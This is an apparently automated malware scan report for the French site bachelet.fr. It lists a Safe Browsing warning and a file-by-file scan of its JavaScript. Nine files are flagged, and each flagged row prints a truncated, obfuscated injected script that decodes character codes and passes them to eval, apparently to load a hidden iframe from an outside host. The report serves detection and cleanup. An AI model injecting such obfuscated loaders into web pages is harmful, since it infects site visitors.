Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bachelet.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bachelet.fr/ | 200 OK Content-Length: 21002 Content-Type: text/html | clean |
http://bachelet.fr/media/system/js/caption.js | 200 OK Content-Length: 6426 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 26539 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/plugins/system/rokbox/themes/dark/rokbox-config.js | 200 OK Content-Length: 2600 Content-Type: application/x-javascript | clean |
http://bachelet.fr/templates/rt_zephyr_j15/js/gantry-articledetails.js | 200 OK Content-Length: 5850 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/components/com_gantry/js/gantry-totop.js | 200 OK Content-Length: 5191 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/components/com_gantry/js/gantry-buildspans.js | 200 OK Content-Length: 5186 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/components/com_gantry/js/gantry-inputs.js | 200 OK Content-Length: 7342 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/components/com_gantry/js/gantry-smartload.js | 200 OK Content-Length: 6611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/templates/rt_zephyr_j15/js/gantry-ie-zindex.js | 200 OK Content-Length: 5180 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/templates/rt_zephyr_j15/js/rt-rokstories-thumb-scroller.js | 200 OK Content-Length: 5464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6e,6f,5d,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6e,6f,5d,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,61,58,67,58,65,24,5a,60,69,5a,63,5c,25,5a,66,64,26,61,67,26,5b,6b,5 Antivirus reports:
| ||
http://bachelet.fr/modules/mod_rokstories/tmpl/js/rokstories.js | 200 OK Content-Length: 6175 Content-Type: application/x-javascript | clean |
http://bachelet.fr/index.php?option=com_morfeoshow&Itemid=53 | 200 OK Content-Length: 20575 Content-Type: text/html | clean |
http://bachelet.fr/components/com_morfeoshow/src/js/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://bachelet.fr/index.php?option=com_content&view=article&id=127&Itemid=61 | 200 OK Content-Length: 18277 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bachelet.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 18 Jan 2015 23:10:33 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 18 Jan 2015 23:10:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1fd62860f8e03f57c32201a3bc2be0d4=8282358e5e4f970b212058189049a301; path=/
X-Powered-By: PHP/4.3.9
GET / HTTP/1.1
Host: bachelet.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 18 Jan 2015 23:10:33 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 18 Jan 2015 23:10:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1fd62860f8e03f57c32201a3bc2be0d4=8282358e5e4f970b212058189049a301; path=/
X-Powered-By: PHP/4.3.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: bachelet.fr
Referer: http://www.google.com/search?q=bachelet.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bachelet.fr
Referer: http://www.google.com/search?q=bachelet.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.